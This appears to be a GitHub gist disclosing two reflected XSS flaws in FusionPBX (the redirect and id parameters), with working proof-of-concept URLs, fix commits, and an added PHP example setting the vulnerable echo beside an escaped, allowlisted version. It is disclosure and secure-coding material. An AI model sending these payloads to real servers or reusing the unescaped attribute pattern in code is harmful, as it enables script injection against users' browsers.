
@xax007 xax007/FusionPBX-XSS.md
Last active Nov 20, 2019

FusionPBX XSS

XSS 1

Cross-site scripting (XSS) vulnerability at line 63 of app/xml_cdr/xml_cdr_search.php allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.

    // ...
    if (strlen(check_str($_GET['redirect'])) > 0) {
        // Vulnerable: check_str() is applied only in the length test; the raw
        // $_GET['redirect'] is concatenated into a single-quoted HTML attribute
        // without any escaping, so a quote in the value closes the attribute.
        echo "<form method='get' action='" . $_GET['redirect'] . ".php'>\n";
    }
    // ...

Proof of concept:
https://domain/app/xml_cdr/xml_cdr_search.php?redirect=123%27%3E%3Csvg/onload=alert(document.domain)%3E%3Ca+href%3d%27

(Screenshot: XSS1)

Fixed: https://github.com/fusionpbx/fusionpbx/commit/f3047c83f3022a4780dca95ed7bccbf3a6fa868e

XSS 2

Cross-site scripting (XSS) vulnerability in file app/fax/fax_files.php allows remote attackers to inject arbitrary web script or HTML via the id parameter.

Proof of concept:
https://domain/app/fax/fax_files.php?id=123%27%3E%3Csvg/onload=alert(document.domain)%3E%3Ca+href%3d%27

(Screenshot: XSS2)

Fixed: https://github.com/fusionpbx/fusionpbx/commit/72a5ce4d2d6bc0ec0e72bbfb76487e4761f292c5
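Both findings are the same bug class: a request parameter written into a single-quoted HTML attribute without escaping. The following is an added example, not FusionPBX code and not the patch in either commit; it reproduces the vulnerable echo from xml_cdr_search.php next to a hardened version and runs both against the decoded PoC value from this gist. Function names and the allowlist pattern are my own choices.

```php
<?php
// Added example (not FusionPBX code): vulnerable attribute interpolation from
// the gist beside a hardened version, exercised with the decoded PoC payload.

// Decoded form of the gist's PoC value for the `redirect` / `id` parameter.
$payload = "123'><svg/onload=alert(document.domain)><a href='";

// Vulnerable pattern from the page: the raw parameter lands inside a
// single-quoted attribute, so a single quote in the value closes it.
function render_form_vulnerable(string $redirect): string {
    return "<form method='get' action='" . $redirect . ".php'>\n";
}

// Hardened: (1) validate the value against what a PHP script basename can be,
// (2) escape for the HTML attribute context with ENT_QUOTES so single quotes
// are encoded too. ENT_COMPAT, the default before PHP 8.1, leaves ' untouched,
// which is exactly what a single-quoted attribute needs protected.
function render_form_hardened(string $redirect): ?string {
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $redirect)) {
        return null; // reject the request; do not try to "clean" the value
    }
    $safe = htmlspecialchars($redirect, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<form method='get' action='" . $safe . ".php'>\n";
}

// Context-correct escaping on its own, for values that may legitimately
// contain arbitrary text (encodes < > & " and, with ENT_QUOTES, ').
function escape_for_attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

echo "vulnerable: " . render_form_vulnerable($payload);
var_dump(render_form_hardened($payload));        // rejected by the allowlist
echo "hardened:   " . render_form_hardened("xml_cdr");
echo "escaped:    " . escape_for_attr($payload) . "\n";
```

The first line of output shows the attribute being closed and a new element opened; the last shows the same value rendered inert, with the quote escaped only because ENT_QUOTES was passed.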
